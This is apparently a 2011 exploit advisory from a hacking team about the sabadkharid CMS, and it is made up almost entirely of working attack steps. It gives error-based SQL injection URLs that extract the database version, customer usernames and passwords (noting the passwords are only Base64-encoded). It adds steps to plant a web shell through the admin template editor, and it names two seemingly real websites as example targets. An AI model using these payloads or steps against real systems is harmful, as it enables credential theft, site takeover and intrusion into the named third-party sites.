========================================================= sabadkharid CMS Multiple Vulnerabilities =========================================================    010101010101010101010101010101010101010101010101010101010      0                                                       0    1     Iranian NOPO Digital Security Team 2011           1    0                                                       0    010101010101010101010101010101010101010101010101010101010     # Exploit Title: sabadkharid CMS Multiple Vulnerabilities # Date: 8/07/2011                            # Author: hosinn                     # Software Link: http://www.sabadkharid.com # Version: professional edition # Platform / Tested on: Multiple # Category: webapplications # Code : N/A # Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar   #  BUG Sql Injectin :  ############################################################### 1 > cart.php have sql injection bug . 2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'     #  Expolite :  #######################################################################   1 > get version    => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select @@version from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/ 2 > get username   => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/             or     => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/   > output like 'admin1' and username:admin   3 > get password   => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select cust_password from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/             or     => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select cust_password from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/   > output like 'cGFzcw==1' and It Base64 Encoded     > Then pass : Decoding 'cGFzcw=='   4 > Then Login To Site   #  BUG LFI :  ###################################################################### 1 > Go To Http://site.com/admin.php 2 > Go To Http://site.com/admin.php?tab=conf&sub=template&edit=../../../cart.php 3 > Then Copy Your Shell script & Save 4 > Find Your Shell in Http://site.com/cart.php # Example  ################################################################## http://tehranshopping.ir/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/ http://elia-co.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select login from skh_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/ #############################################################################   Our Website : http://www.nopotm.ir   Special Thanks to :  N3td3v!l , H-SK33PY , Immortal Boy , BigB4NG   Blacksun , Drosera^Cqq47 , NOPO , zilli0o0n &  all iranian NOPO members   #############################################################################